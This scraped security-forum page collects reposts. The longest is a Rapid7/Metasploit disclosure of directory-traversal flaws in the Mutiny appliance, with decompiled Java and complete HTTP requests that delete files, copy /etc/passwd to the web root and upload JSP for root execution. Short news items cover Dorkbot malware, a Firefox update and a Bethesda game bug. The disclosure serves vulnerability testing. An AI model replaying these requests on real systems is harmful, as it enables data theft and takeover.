Disclosure to CERT/CC 2013-05-14 Version 5.0-1.11 tested and not vulnerable to the disclosed exploitation (1) 2013-05-15 Public Disclosure 2013-05-15 Metasploit exploit module published Prior to public disclosure the last version available has been tested and the disclosed exploit techniques don't work anymore. The tested version has been "5.0-1.11 (EAGLe) - (02-05-13)". Since the vendor didn't warn us about the patch neither asked us to review the patch we can't assure the current patch is 100% confident and secure, neither have details about revisions between 5.0.1-07 and 5.0.1-11 which could be vulnerable. We encourage you to use the current Metasploit modules in order to test your Mutiny installation for the disclosed vulnerabilities. Technical Analysis The Web Frontend of Mutiny is provided in part by a Java Web Application. This frontend provides a "Documents" section for authenticated users for any role: The Documents functions are in part provided by a servlet named "EditDocument". This servlets provides several "Documents" functions such as upload, copy, move and delete documents: protected void doPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse) throws ServletException, IOException . . s = httpservletrequest.getParameter("operation"); if(ServletFileUpload.isMultipartContent(httpservletrequest)) s = "UPLOAD"; . . . if(!s.equals("NEW")) goto _L2; else goto _L1 . . . if(!s.equals("RENAME")) goto _L5; else goto _L4 . . . if(!s.equals("DELETE")) goto _L7; else goto _L6 . . . if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8 The UPLOAD operation can be abused via a Directory Traversal vulnerability in the “uploadPath” parameter to upload arbitrary file and contents to the remote filesystem with root privileges: if(s.equals("UPLOAD")) { ServletFileUpload servletfileupload = new ServletFileUpload(new DiskFileItemFactory()); List list = null; try { list = servletfileupload.parseRequest(httpservletrequest); } catch(FileUploadException fileuploadexception) { fileuploadexception.printStackTrace(); } String s6 = null; FileItem fileitem = null; Iterator iterator = list.iterator(); do { if(!iterator.hasNext()) break; FileItem fileitem1 = (FileItem)iterator.next(); if(fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadPath")) s6 = fileitem1.getString(); // User controlled else if(!fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadFile")) fileitem = fileitem1; // User controlled } while(true); if(s6.length() == 0) { System.out.println("Error: uploadPath not set."); s6 = "/documents"; } if(fileitem == null) { System.out.println("Error: uploadFile not set."); } else { File file5 = new File(DocumentUtils.root, s6); // Directory Traversal File file7 = new File(file5, fileitem.getName()); file7.getParentFile().mkdirs(); file7 = DocumentUtils.getUniqueFile(file7, false); file7.createNewFile(); try { fileitem.write(file7); // Write file if(file7.exists() && file7.length() == fileitem.getSize()) flag = true; if(debug) System.out.println((new StringBuilder()).append(s).append(": ").append(file7.getPath()).toString()); } catch(Exception exception) { exception.printStackTrace(); } } } The DELETE operation is also affected by a directory traversal vulnerability in the “paths[]” parameter, which allows to delete arbitrary files with root privileges: _L5: if(!s.equals("DELETE")) goto _L7; else goto _L6 _L6: String as1[] = httpservletrequest.getParameterValues("paths[]"); // User controlled String as2[] = as1; int j = as2.length; for(int k = 0; k < j; k++) { String s7 = as2[k]; File file6 = new File(DocumentUtils.root, s7); // Directory Traversal if(!isValid(file6)) return; if(file6.isDirectory()) FileUtils.deleteDirectory(file6); // Delete directory else flag = file6.delete(); // Delete file if(debug) System.out.println((new StringBuilder()).append("DELETE: ").append(file6.getPath()).toString()); } Also the CUT and COPY operation is also affected by directory traversal vulnerabilities in the “paths[]” and “newPath” parameters, which allows to copy and move files around the remote file system with root privileges: if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8 _L8: File file2; String as3[]; String s4 = httpservletrequest.getParameter("newPath"); file2 = new File(DocumentUtils.root, s4); // Directory Traversal in newPath as3 = httpservletrequest.getParameterValues("paths[]"); if(as3 == null) goto _L3; else goto _L10 _L10: String as4[]; int l; int i1; as4 = as3; l = as4.length; i1 = 0; _L11: File file8; File file9; FileInputStream fileinputstream; FileOutputStream fileoutputstream; if(i1 >= l) break; /* Loop/switch isn't completed */ String s8 = as4[i1]; file8 = new File(DocumentUtils.root, s8); // Directory traversal in paths[] if(!isValid(file8)) return; file9 = new File(file2, file8.getName()); // Directory traversal in newPath file9 = DocumentUtils.getUniqueFile(file9, file8.isDirectory()); if(debug) System.out.println((new StringBuilder()).append(s).append(": ").append(file9.getPath()).toString()); file9.getParentFile().mkdirs(); if(s.equals("CUT")) { flag = file8.renameTo(file9); // CUT operation affected by directory traversals break MISSING_BLOCK_LABEL_881; } if(!s.equals("COPY")) break MISSING_BLOCK_LABEL_881; if(!file9.exists()) file9.createNewFile(); fileinputstream = null; fileoutputstream = null; fileinputstream = new FileInputStream(file8); // COPY operationaffected by directory traversals fileoutputstream = new FileOutputStream(file9); byte abyte0[] = new byte[4096]; int j1; while((j1 = fileinputstream.read(abyte0)) > 0) fileoutputstream.write(abyte0, 0, j1); flag = true; fileinputstream.close(); fileoutputstream.close(); break MISSING_BLOCK_LABEL_881; Exception exception1; exception1; System.err.println(exception1.getMessage()); fileinputstream.close(); fileoutputstream.close(); break MISSING_BLOCK_LABEL_881; Exception exception2; exception2; fileinputstream.close(); fileoutputstream.close(); throw exception2; i1++; if(true) goto _L11; else goto _L3 Exploitation After examining the “doPost()” function from the “EditDocument” servlet, requests to abuse these functions have been built. DELETE operation The next request allows deleting an arbitrary file from the filesystem: POST /interface/EditDocument HTTP/1.1 Host: 192.168.1.177 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 Content-Length: 76 Accept: */* Origin: http://192.168.1.177 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Referer: http://192.168.1.177/interface/documents.jsp Accept-Language: en-us Accept-Encoding: gzip, deflate Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D Connection: keep-alive Proxy-Connection: keep-alive operation=DELETE&paths%5B%5D=../../../../test.msf In this case the “/test.msf” will be deleted in the remote file system. The 4 level traversal is due to “DocumentUtils.root” by default pointing to “/var/MUTINY/upload/documents” in the Linux based appliance. The response to the request informs if the file deletion has been successful: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-UA-Compatible: IE=10 Content-Type: application/json;charset=UTF-8 Content-Length: 16 Date: Fri, 08 Mar 2013 02:16:18 GMT {"success":true} COPY operation The copy operation allows copying arbitrary files in the remote file system with root privileges. By copying arbitrary files to the default web root in the appliance it’s possible to retrieve arbitrary files. The next request allows copying the “/etc/passwd” file to the web root for mobile devices, by default located at “/usr/jakarta/tomcat/webapps/ROOT/m” in the Mutiny Linux based appliance: POST /interface/EditDocument HTTP/1.1 Host: 192.168.1.177 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 Content-Length: 111 Accept: */* Origin: http://192.168.1.177 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Referer: http://192.168.1.177/interface/documents.jsp Accept-Language: en-us Accept-Encoding: gzip, deflate Cookie: JSESSIONID=14CE95F1ED56321B4B226DF669D691C0; JSESSIONIDSSO=FA98603965548C3FB1F67BC5121A75DC Connection: keep-alive Proxy-Connection: keep-alive operation=COPY&paths%5B%5D=../../../../etc/passwd%00.txt&newPath=../../../../usr/jakarta/tomcat/webapps/ROOT/m/ The response to the request informs if the file deletion has been successful: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-UA-Compatible: IE=10 Content-Type: application/json;charset=UTF-8 Content-Length: 16 Date: Fri, 08 Mar 2013 04:11:17 GMT {"success":true} By accessing to *ttp://appliance/m/passwd is possible to retrieve the remote file: UPLOAD operation The upload operation allows uploading an arbitrary file to the file system with root privileges. By uploading a JSP file to the “/usr/jakarta/tomcat/webapps/ROOT/m” default location, arbitrary Java can be executed with root privileges by later invoking the JSP file via the web interface. The next request allows uploading JSP code to the "/usr/jakarta/tomcat/webapps/ROOT/m/msf.jsp” location: POST /interface/EditDocument HTTP/1.1 Host: 192.168.1.177 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 Content-Length: 491 Accept: */* Origin: http://192.168.1.177 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPxNcR2XfK8d5gMeU Referer: http://192.168.1.177/interface/documents.jsp Accept-Language: en-us Accept-Encoding: gzip, deflate Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D Connection: keep-alive Proxy-Connection: keep-alive ------WebKitFormBoundaryPxNcR2XfK8d5gMeU Content-Disposition: form-data; name="uploadFile"; filename="msf.jsp" Content-Type: application/octet-stream <html> <head><title>Metasploit Test Page</title></head> <body> <font size="10"><%="Metasploit Test" %></font> </body> </html> ------WebKitFormBoundaryPxNcR2XfK8d5gMeU Content-Disposition: form-data; name="uploadPath" ../../../../usr/jakarta/tomcat/webapps/ROOT/m ------WebKitFormBoundaryPxNcR2XfK8d5gMeU— The response to the request informs if the file upload has been successful: By accessing to *ttp://appliance/m/msf.jsp is possible to execute the uploaded JSP code: Metasploit modules In order to assist vulnerability testing two modules for the Metasploit framework have been developed. mutiny_frontend_read_delete The “mutiny_frontend_read_delete” is an auxiliary module which abuses the DELETE and COPY operations to retrieve or delete arbitrary files from the remote system: Reading /etc/passwd Deleting remote files mutiny_frontend_upload The "mutiny_frontend_upload" is an exploit module which abuses the UPLOAD operation to upload an arbitrary JSP code and an arbitrary payload embedded in an ELF file. The last one is executed through the invocation of the JSP stager: Exploits: Mutiny Vulnerabilities by Juan Vazquez Sursa : https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities
  23. Cum actioneaza virusul Dorkbot ce se raspandeste prin chat-ul Facebook Virusul Dorkbot se foloseste de retele de tip IRC (Internet Relay Chat) pentru a transmite si a primi date si a fost detectat de Bitdefender intr-o versiune initiala in urma cu doi ani, ca Backdoor.IRCBot.Dorkbot. Noua varianta a virusului, aparuta in ultima saptamana, se raspandeste sub forma unor linkuri prin mesaje de pe chat-ul Facebook si isi poate face singura actualizarile pentru a-si instala cea mai noua versiune. Virusul a fost impachetat acum intr-o forma noua, cu scopul de a evita solutiile antivirus. Softul periculos are astfel capacitati rootkit, putand chiar sa impiedice antivirusul sa efectueze actualizari de securitate. Dorkbot poate, de asemenea, spiona activitatea utilizatorilor in browser. in afara de mesageria instant, virusul se poate raspandi si prin dispositive USB. Utilizatorii nu trebuie sa dea click pe mesaje care, desi par fotografii, sunt fisiere executabile. La descarcare, ele instaleaza fara consimtamantul utilizatorilor un software periculos ce ofera atacatorilor control asupra calculatorului infectat. in general, este periculoasa executarea unui astfel de fisier (cu extensia ‘.exe’) indiferent daca este primit de la prieteni sau de la persoane necunoscute, prin intermediul programelor de mesagerie instanta (Facebook, Yahoo Messenger etc.) In ultimii doi ani, Bitdefender a observat o crestere a numarului de virusi propagati prin retele sociale, cel mai adesea prin scam-uri de pe Facebook. In Romania, cele mai populare sunt de tipul "vezi cine ti-a vazut profilul." In topul site-urilor periculoase raspandite pe Facebook se afla si linkurile frauduloase, care incearca sa ii convinga pe utilizatori sa participe la sondaje pentru a castiga premii, de obicei telefoane mobile sau tablete. Phishingul, prin care utilizatorilor li se fura date personale, nu mai este atat de popular ca in anii de inceput ai retelelor sociale, pentru ca utilizatorii au invatat sa recunoasca astfel de mesaje. Utilizatorii sunt sfatuiti sa isi mentina atat solutia antivirus actualizata, cat si sistemul de operare si aplicatiile pe care le folosesc. De asemenea, ei isi pot instala solutia gratuita Safego, care le scaneaza link-urile de pe Facebook si ii protejeaza de cele mai noi amenintari informatice, cum ar fi spam, phishing si malware, dar si de supra-expunerea datelor personale. Sursa : Smartnews - Cum actioneaza virusul Dorkbot ce se raspandeste prin chat-ul Facebook
  24. Not to be outdone by Microsoft's and Adobe's Patch Tuesday releases, Mozilla pushed out its latest browser and email client updates today. The Firefox browser goes to 21.0, on Android as well as on desktops. (You don't install browsers on your servers, do you?) The Thunderbird email client is only available in an Extended Support Release these days, meaning it gets regular security patches but infrequent product enhancements; it hits 17.0.6. Microsoft's May 2013 Internet Explorer updates included two patches for which the world was waiting with bated breath - one to fix a vulnerability exposed at the 2013 PWN2OWN competition, and a second to close a much-publicised zero-day briefly found on a US government website at the end of April. Mozilla, on the other hand, fixed its own PWN2OWN-found flaws within 24 hours, so its last two updates, 20.0 and 21.0, have been largely proactive on the security front. This time round, there are 681 listed bug fixes, with eight separately-documented security advisories. Three of those close multiple holes that Mozilla admits "are potentially exploitable, allowing for remote code execution." "Memory corruption problems, where software incorrectly writes over its own or another program's code or data structures, are not always exploitable for malicious purposes. But they are always wrong, and often dangerous, especially in browsers and email clients, which spend most of their time processing content from untrusted external sources." Mozilla, very creditably, tends not to mince its words when dealing with bugs of this sort. For example, in Mozilla Foundation Security Advisory 2013-41, no exploits were immediately obvious for any of the bugs fixed, leading the team to report nothing worse that than "we presume that with enough effort at least some of these could be exploited to run arbitrary code." Nevertheless, this advisory was rated Critical. Many users will have Firefox set to grab and deploy updates automatically; if you're one of those who don't, it's Make Your Mind Up Time! If it helps you to decide, I just published this story in Firefox 21.0 on OS X, immediately after updating. That's a very minor and entirely unrepresentative "test", but I'm pleased to say my plugins (including the Firebug debugger) have all behaved themselves, and I haven't had any problems. Sursa : Mozilla pushes out new Firefox and Thunderbird: 8 security advisories, 3 critical fixes | Naked Security
      • 1
      • Upvote
  25. Skyrim A SECURITY RESEARCHER has posted details of a hacking exploit that can get you into games including Skyrim and Fallout 3. Researcher Joe Giron describes himself on his blog by saying, "I'm 25, I'm a Linux admin, and I like to break things. Software mostly." There isn't much to exploit in terms of security here, but what we do have is a longstanding vulnerability that affects a swathe of games. "I found a format string vulnerability in Morrowind, Oblivion, Fallout 3, Fallout New Vegas, and the latest game Skyrim," he wrote. "And it's also not just The Elder Scrolls games that are affected. Since Bethesda produced The Elder Scrolls games, its worth mentioning that other games produced by this company are vulnerable to this same attack. I'm of course talking about Fallout 3 and its counterpart, Fallout New Vegas." The scripting vulnerability dates back to at least 2001, which is when Morrowind was released. We have asked Bethesda to comment, but so far it has stayed mute. Giron has posted up proof of the exploit in action, showing how a simple command key can kick off crashes in a range of Bethesda games. "I'm certain the same vulnerability lies in Fallout 3 and Oblivion however I was too lazy to install to show you all, but you get the idea. Same vulnerable scripting module," he added. "So far, the only feasible way to exploit the game I've come up with is by some sort of hand crafted mod or plugin for the game as that would have access to the scripting console on which the vulnerabilities lie. That said, it would be difficult to exploit in the wild also do in part to the video games having no network capability." Sursa : http://www.gironsec.com/blog/2013/05/exploit-in-skyrim/ http://www.theinquirer.net/inquirer/news/2267690/hacking-exploit-pops-up-for-bethesda-s-skyrim-and-fallout
×
×
  • Create New...